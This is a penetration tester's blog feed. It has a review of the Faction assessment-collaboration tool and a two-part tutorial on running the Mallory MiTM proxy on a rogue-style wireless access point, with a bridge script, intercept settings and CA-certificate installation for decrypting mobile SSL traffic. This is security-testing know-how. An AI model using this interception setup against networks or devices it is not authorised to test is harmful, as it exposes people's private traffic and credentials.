tag:blogger.com,1999:blog-24105491300059815302024-03-14T01:25:14.904-05:00Confessions of a Penetration TesterThis blog is mostly for my own archiving of vulnerabilities I have discovered and defensive techniques. Hopefully it will serve others as well.<br><br><br><br><br><br><br><br><br><br>Unknownnoreply@blogger.comBlogger25125tag:blogger.com,1999:blog-2410549130005981530.post-64320760990252280952016-12-02T15:57:00.001-06:002016-12-02T15:57:55.877-06:00Pen testing Collaboration with FuseSoft FactionIf you have not checked out <a href="https://www.fusesoftsecurity.com/">FuseSoft Faction</a> and you're on a web and mobile/ application security penetration testing team then you might ought to give it a look. The project is currently in beta and free to download and try right now as long as your willing to provide feedback.<br />
<br />
<a href="https://www.fusesoftsecurity.com/">FuseSoft</a> develops Assessment Collaboration, Vulnerability Management, and Assessment Automation software. The idea is to automate much of the overhead from penetration testing teams so they can get back to finding more bugs instead of writing reports, managing assessment scheduling, or keeping up with retesting, etc. They include collaboration and workflow enhancements into burp suite and in many cases you can enter all your findings right from burp and never have to log into the actual site. Default vulnerability information is repopulated for you by the tools so you don't have to rewrite or copy/paste descriptions and remediation recommendations for issues like XSS or SQLi or many others that you find assessment after assessment.<br />
<br />
Below is the main Dashboard. Assessors have access to all of their current assessment and retest queues. There is even a "Your Week" box a the bottom that holds your current assessment scope and information. The idea is that all the information is pre-populated and ready for you to start hacking as soon as you log in on Monday morning. It even displays the other assessors who are working with you that week.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iQy6bOmY0BI/WEHimt5lGHI/AAAAAAAAEz8/qaTYj7CXDuIjf9s4CKRrWSXRKHePKx06wCLcB/s1600/dashboard.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="475" src="https://1.bp.blogspot.com/-iQy6bOmY0BI/WEHimt5lGHI/AAAAAAAAEz8/qaTYj7CXDuIjf9s4CKRrWSXRKHePKx06wCLcB/s640/dashboard.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can open an assessment to view the details and add vulnerabilities. There is a running total of all issues discovered at the top of the screen. Entering vulnerabilities common vulnerabilities will pre-populate the boiler plate text.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.fusesoftsecurity.com/img/ss/vulnEntry2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://www.fusesoftsecurity.com/img/ss/vulnEntry2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Below shows how the vulnerability entry works from the web site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-O22eQ7kLGL8/WEHjz2ltvVI/AAAAAAAAE0M/RGmYSq122AIV4O_FE-9FGnsAHXPjLnnGQCLcB/s1600/vuln%2Bentry.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://4.bp.blogspot.com/-O22eQ7kLGL8/WEHjz2ltvVI/AAAAAAAAE0M/RGmYSq122AIV4O_FE-9FGnsAHXPjLnnGQCLcB/s640/vuln%2Bentry.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But your not restricted to just using the website to enter vulnerabilities. There is some pretty robust burp suite integration. You can add vulnerabilities and extracts of the vulnerable payloads just by selecting response text and right clicking. It has the option to upload the request and/or response as well as snip out cookie information. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For example say we found XSS on a site. We have fully exploited it in burp repeater. Just right click, search for the XSS default vulnerability, and even add exploit steps all from inside Burp.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XUXKNmk6Lcg/WEHimKN3VEI/AAAAAAAAEzg/hIGs48Bf3osE40XPdZpMND8aNyjIF3KpwCEw/s1600/Add%2BFrom%2Bburp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://2.bp.blogspot.com/-XUXKNmk6Lcg/WEHimKN3VEI/AAAAAAAAEzg/hIGs48Bf3osE40XPdZpMND8aNyjIF3KpwCEw/s640/Add%2BFrom%2Bburp.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
The message box supports the Markdown Syntax so you can do some light report editing right from inside burp. The result will look like the following screenshot on the web version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-pOEkPmj0H34/WEHimkmYLrI/AAAAAAAAEz4/XiRWqUU4RBEATi7K5mpznM_3-76Wn65zgCEw/s1600/burp%2Bto%2Breport.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://4.bp.blogspot.com/-pOEkPmj0H34/WEHimkmYLrI/AAAAAAAAEz4/XiRWqUU4RBEATi7K5mpznM_3-76Wn65zgCEw/s640/burp%2Bto%2Breport.PNG" width="640" /></a></div>
<br />
Notice our exploit Steps have been converted to Rich Text, We have an example payload. We also have the full Request and only the selected response extracted. You can then perform further edits like highlight the specific exploit RED so that its easier to identify.<br />
<br />
All of this goes from the WYSIWYG editor to DOCX reports. Below is an example extract of the MS Word Report.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-WJNJRwOtS6c/WEHimnnK6II/AAAAAAAAE0A/YB1iZ5l4KSsWLf8zTVFPj6VSH4fLiPbWwCEw/s1600/generated%2Breport.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-WJNJRwOtS6c/WEHimnnK6II/AAAAAAAAE0A/YB1iZ5l4KSsWLf8zTVFPj6VSH4fLiPbWwCEw/s640/generated%2Breport.PNG" width="544" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The enhancements don't stop there either. The burp plugin will update in mealtime to display all new findings being discovered. During collaborative assessments you can see what other issues other users are finding and you can even replay their payloads. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Below is an example of the vulnerability history for this application that is being tested. You see all issues from previous assessments and the new issues that your fellow assessors are finding. If you click any vulnerability in the table you will be presented with the full description and exploit steps. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The Burp plugin detects if its a valid payload that can be replayed and creates a link above the request. This allows the current assessor to replay with just a click. Notice below the hyper link above the request that displays 'Send to Repeater'.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-XdnoFlRODnE/WEHimSv7j-I/AAAAAAAAEzo/k1nj8t2jkI0jaCnrs0lS1V8o2CLsFLKdQCEw/s1600/Exploit%2BDetails.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://1.bp.blogspot.com/-XdnoFlRODnE/WEHimSv7j-I/AAAAAAAAEzo/k1nj8t2jkI0jaCnrs0lS1V8o2CLsFLKdQCEw/s640/Exploit%2BDetails.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You get this same functionality with retests as well. If a verification retest is assigned to you then you can pull of the previous assessment's payload and replay it. This saves you the time of trying to find previous Burp states and correct requests that were used to exploit the vulnerability originally taking a lot of the guess work out of retests. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In addition to the ability to just replay existing vulnerabilities via burp, it can also allow you to send repeater items, site maps, proxy history, and scan items directly to another user. You can right click the item or items and then just select other online users and they will show up in their Burp session. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In the below screenshot we can take this exact repeater request and send to another user's repeater.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-m3en9FWzY1k/V9bi4c_avKI/AAAAAAAAAJQ/8fClzMElFLgVsPX1P1egCTEMbss71NpAgCPcB/s1600/Repeater.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="https://2.bp.blogspot.com/-m3en9FWzY1k/V9bi4c_avKI/AAAAAAAAAJQ/8fClzMElFLgVsPX1P1egCTEMbss71NpAgCPcB/s640/Repeater.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The Title you add will display as a new Repeater tab title. This is useful for collaborating on finding an valid exploit payload. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Report Generation and Peer Reviews:</h4>
<div>
I discussed briefly the report generation features above but there is more! You can upload your current reporting templates and Faction will output reports in those styles. There is a huge selection of variables that can be inserted into your original templates that will be replaced with assessment data. </div>
<div>
<br /></div>
<div>
More information on that can be found <a href="http://blog.fusesoftsecurity.com/p/report-designer-tags.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rUTH6grHKo4/WEHimb-jfbI/AAAAAAAAE0U/4bkCdM8LAiskItQGY280ALfsjcCvzpRUwCEw/s1600/Report%2Btable.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://2.bp.blogspot.com/-rUTH6grHKo4/WEHimb-jfbI/AAAAAAAAE0U/4bkCdM8LAiskItQGY280ALfsjcCvzpRUwCEw/s640/Report%2Btable.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
After reports are generated they can be added to the Peer Review Queue. This allows your peers to make changes to your reports before you finalize and send them out to the application owners. It allows your peers to strike out text or added notes to the side regions to alert you of issues. Its a typical change tracking functionality that you would find in Word but all web based. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BMaWh3EzKyQ/WEHpTkj1XdI/AAAAAAAAE0c/iUUlXJYw8YgkCJiUNk9nrqUZREfn_zasgCLcB/s1600/Tracking.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://1.bp.blogspot.com/-BMaWh3EzKyQ/WEHpTkj1XdI/AAAAAAAAE0c/iUUlXJYw8YgkCJiUNk9nrqUZREfn_zasgCLcB/s640/Tracking.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Vulnerability Management:</h4>
<div>
Vulnerability Management teams have a queue that shows all vulnerabilities assigned to them for remediation that are approaching due dates, gone past due, are out to assessors for retest, and retests that have gone past due. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Lv4n2TZF0dE/WEHim-JsebI/AAAAAAAAE0U/YsKmhm7ZzA4WeqfX1ZXRBpcwdkXG_93HACEw/s1600/remediation.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://1.bp.blogspot.com/-Lv4n2TZF0dE/WEHim-JsebI/AAAAAAAAE0U/YsKmhm7ZzA4WeqfX1ZXRBpcwdkXG_93HACEw/s640/remediation.PNG" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
They can also search for vulnerabilities and add notes about them, close them in development and/or close them in production.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Assessment Scheduling:</h4>
<div>
<a href="https://www.fusesoftsecurity.com/" target="_blank">Faction </a>keeps track of all your assessors schedules and will alert you when an assessor is not available for the next big assessment. The system shows all assessors and annotates the user as [Not Free] to ensure you don't select them when they are off on other projects. You can still add them to an assessment even if they are not free though. </div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9MG0Xqt9w-o/WEHimjl7TBI/AAAAAAAAE0U/pxuRr-DlEdUq7GyQr8dT4_FCmiMTxsHpwCEw/s1600/Who%2527s%2BFree.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://1.bp.blogspot.com/-9MG0Xqt9w-o/WEHimjl7TBI/AAAAAAAAE0U/pxuRr-DlEdUq7GyQr8dT4_FCmiMTxsHpwCEw/s640/Who%2527s%2BFree.PNG" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There are forms to update the scope for the assessment and add files that might be required. This ensures that the assessor has all the information they need when they start the assessment.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 style="clear: both; text-align: left;">
But wait there is more:</h4>
<div>
<a href="https://www.fusesoftsecurity.com/" target="_blank">Faction </a>has a full REST API and a event based API that allows it to integrate with other systems. The even based API allows you to write python code to integrate with existing tracking systems or application inventory systems. </div>
<div>
<br /></div>
<div>
The Rest based API will allow you to schedule assessments, query applications and vulnerabilities, and much more. The Faction Burp plugin was developed to use this API.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XfdWNI-NR_U/WEHimDwPDPI/AAAAAAAAE0U/AddBGNLTdB8pfSeU8SXpW8s49LyInaS1ACEw/s1600/API.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://2.bp.blogspot.com/-XfdWNI-NR_U/WEHimDwPDPI/AAAAAAAAE0U/AddBGNLTdB8pfSeU8SXpW8s49LyInaS1ACEw/s640/API.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h4 style="clear: both; text-align: left;">
Conclusion</h4>
<div>
Check it our while its still free. Its a fully developed assessment workflow and collaboration engine that runs on a Tomcat Server with a Mongo backend. Really easy to install and use. </div>
<div>
<br /></div>
<div>
Find out more at the <a href="https://www.fusesoftsecurity.com/" target="_blank">FuseSoft Security Site.</a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-83898028280225239132012-04-08T23:54:00.002-05:002012-04-09T00:03:30.360-05:00Mallory MiTM Proxy as a Wireless Access Point (Part 2 of 2)<span style="font-family: Arial, Helvetica, sans-serif;">In Part 1 we got an Virtual Machine partially running as a wireless access point using Virtual Box, Ubuntu, hostapd, and an <a href="http://www.amazon.com/gp/product/B005ETA5K2/ref=as_li_tf_tl?ie=UTF8&tag=autonacom-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=B005ETA5K2">Alfa wifi card.</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=autonacom-20&l=as2&o=1&a=B005ETA5K2" style="border: none !important; margin: 0px !important;" width="1" /> In this Post we will fully configure the AP and install/configure <a href="http://intrepidusgroup.com/insight/mallory/" target="_blank">Mallory</a> to MiTM anything that connects to the virtual Wireless Access Point.</span><br />
<br />
<br />
<h3>Create An AccessPoint Startup Script</h3><div><span style="font-family: Arial, Helvetica, sans-serif;">We have one more prerequisite before we can continue. We need to create a network bridge so the access point can connect to the NAT'ed ethernet adaptor. If its not already installed go ahead and install bridge-utils.</span></div><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div><span style="font-family: 'Courier New', Courier, monospace;">> sudo apt-get install bridge-utils</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">In your home folder create a file named startAP.sh and enter the following text.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">#!/bin/bash</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># stop the network manager</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">stop network-manager</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">#create the bridge and add eth0 </span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addbr br0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addif br0 eth0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">#Start the Access Point</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">hostapd -B ./rtl_hostapd.conf > /var/log/hostapd.log</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"># wait for AP to come online before adding it to the bridge</span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">sleep 5</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">#Add the wireless AP to the bridge</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;">brctl addif br0 wlan0</span><br />
<span style="color: #0b5394; font-family: 'Courier New', Courier, monospace;"> dhclient br0</span><br />
<div style="font-family: Arial, Helvetica, sans-serif;"><br />
</div><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run your script.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> chmod 755 ./startAP</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo ./startAP</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4HDXqBcXuGk/T4JfxtwCi1I/AAAAAAAACt0/d6tdyHgDycE/s1600/AP+Running.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="http://2.bp.blogspot.com/-4HDXqBcXuGk/T4JfxtwCi1I/AAAAAAAACt0/d6tdyHgDycE/s320/AP+Running.jpg" width="320" /></a></div><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div><br />
<br />
<span style="color: red; font-family: Arial, Helvetica, sans-serif;">*NOTE: ensure the birdge=br0 is somewhere in your hostapd config file. </span><br />
<span style="color: red; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You should now have a fully configured Wireless access point. Try to get you mobile device or other computer to connect to the internet through this access point. In some instances you will have to manually add your IP address on the device. Usually setting something like the following will work: </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">IP Address: 10.0.2.17 </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">SubnetMask: 255.255.255.0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Router: 10.0.2.2</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">DNS: 8.8.8.8</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3>Mallory Installation Steps</h3><span style="font-family: Arial, Helvetica, sans-serif;">In the virtual machine that was created in Part 1 you must drop to a terminal and first install mercurial before anything else.</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">> sudo apt-get install mercurial</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Now determine a directory where you want to install and run Mallory. I like having it in my home Dir so thats where the rest of this tutorial will make reference to it.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">> cd ~<br />
> hg clone https://bitbucket.org/IntrepidusGroup/mallory<br />
> cd mallory<br />
> sudo ./mallory_install.sh<br />
> sudo ./mallory_install.sh</span><span style="background-color: white; line-height: 1.5;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">The first time you run the installation script it will ask you to verify you have an internet connection. Once you verify you just run the same script again and it will download and install all of the dependencies.</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Lets MiTM some traffic!!!</span></span></h3><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Finally the fun happens! We need to start the Mallory core process and then the Mallory GUI while the AP is running.</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> cd ~/mallory/current/src</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> sudo python ./mallory.py</span></span><br />
<span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;">Open another terminal and type:</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;">> sudo python ./launchgui.py</span></span><br />
<span style="line-height: 24px;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;">Once the GUI comes up Select the Interfaces Tab and ensure that br0 is checked for "Perform MiTM" and eth0 is checked for "Outbound Interface" and Click Apply.</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-REVLbVSDEzQ/T4JiyKanXhI/AAAAAAAACt8/EUzTZWq-Zjo/s1600/inferface_config.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-REVLbVSDEzQ/T4JiyKanXhI/AAAAAAAACt8/EUzTZWq-Zjo/s320/inferface_config.jpg" width="224" /></a></div><span style="line-height: 24px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;">Select the Protocols tab and uncomment the line starting with ssl_2 and Click Apply.</span></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-UDQr0e4pVpM/T4JjEsxxpxI/AAAAAAAACuE/kFW_w7iIRaM/s1600/SSL+Config.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-UDQr0e4pVpM/T4JjEsxxpxI/AAAAAAAACuE/kFW_w7iIRaM/s320/SSL+Config.jpg" width="268" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 24px;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Click the Rules tab and ensure that Debug All is the current rule if not create it by copying the setting in the following ScreenShot.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-VeyTtAhN33o/T4JjdP6Og4I/AAAAAAAACuM/A_xfivEzV5A/s1600/debug_all.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="http://4.bp.blogspot.com/-VeyTtAhN33o/T4JjdP6Og4I/AAAAAAAACuM/A_xfivEzV5A/s320/debug_all.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="color: #525252; font-family: 'Courier New', Courier, monospace;"><span style="line-height: 24px;"><br />
</span></span><br />
<br />
<div><span style="font-family: Arial, Helvetica, sans-serif;">Now Click on Streams and click "Intercept" and "AutoSend". After this you can navigate to some site on your phones browser and you should see the streams populating to the screen.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-qpq1q-k9kys/T4JktUJDT7I/AAAAAAAACuU/V5PTWOQaK6I/s1600/Streams.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-qpq1q-k9kys/T4JktUJDT7I/AAAAAAAACuU/V5PTWOQaK6I/s320/Streams.jpg" width="320" /></a></div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Additional Set Up</span></h3><h2><span style="font-family: Arial, Helvetica, sans-serif;">Strip Encoding</span></h2><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div><span style="font-family: Arial, Helvetica, sans-serif;">There are a few things your going to want to do here to really MiTM some traffic. First your going to want to create a rule that strips encoding on web pages since mallory does not automatically decode these like Burp Suite does. </span></div><div><ol><li><span style="font-family: Arial, Helvetica, sans-serif;">Select the Rules tab.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Set the Name to "Strip Encoding".</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Direction C2S (Client to Server)</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The Type is Muck</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Enter </span><span style="font-family: 'Courier New', Courier, monospace;">Accept-Encoding: gzip.*/Header: fake/1</span><span style="font-family: Arial, Helvetica, sans-serif;"> into the Muck textbox.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Passthu = yes</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Move "Strip Encoding" to the top.</span></li>
</ol><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-90HsESk_bQg/T4JoWeOSETI/AAAAAAAACuc/QMavhzumEx8/s1600/Strip+Encoding.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://2.bp.blogspot.com/-90HsESk_bQg/T4JoWeOSETI/AAAAAAAACuc/QMavhzumEx8/s320/Strip+Encoding.jpg" width="320" /></a></div><div><span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div></div><span style="font-family: Arial, Helvetica, sans-serif;">Now Mallory will send "Header: fake" instead of "Accept-Encoding: gzip,deflate" on all HTTP requests which prevents the server from sending a compressed response (i.e. you can read the responses it in Mallory's Streams tab now).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h3><span style="font-family: Arial, Helvetica, sans-serif;">Install the CA Cert on a mobile device</span></h3><span style="font-family: Arial, Helvetica, sans-serif;">The next thing you will want to do is add Mallory's CA cert to your device. This is how you can intercept SSL traffic without the mobile device giving you SSL warnings or some apps will not connect at all if the certs are not signed by a trusted CA. </span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The Mallory CA is located in ~/mallory/current/src/ca/ca.cer. If your intercepting traffic on IOS you can just email this cert to yourself, open the attachment with the IOS mail client, and select install. Now you can intercept SSL traffic with IOS apps that do certificate checks (and almost all do). On Android devices you need to install this certificate into /etc/security/cacerts.bks. You will need to jailbreak the device to do this and you will need the android SDK. There are already alot of articles on this so i'm not going to go into detail here. Maybe in another post.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Thats it. Good Luck! :)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-68722780208117722012012-04-07T00:12:00.001-05:002012-04-08T22:27:51.319-05:00Mallory MiTM Proxy as a Wireless Access Point (Part 1 of 2)<a href="http://intrepidusgroup.com/insight/mallory/" target="_blank">Mallory MiTM Proxy</a> is great tool if you need to intercept and modify non HTTP connections. I generally use this tool while doing mobile assessments to get an idea of all the connections the device is performing in the background. It allows you to intercept most types of tcp and udp connections and has special translators for HTTP protocols. I still prefer using BurpSuite for HTTP protocols but since Mallory understands protocols that BurpSuite does not it reamins a great tool to have on your side.<br />
<br />
There are a ton of ways to setup and configure Mallory. The easiest is as a VPN but I feel the wireless access point is more robust and easier to get your devices proxing through it once you have it set up.<br />
<br />
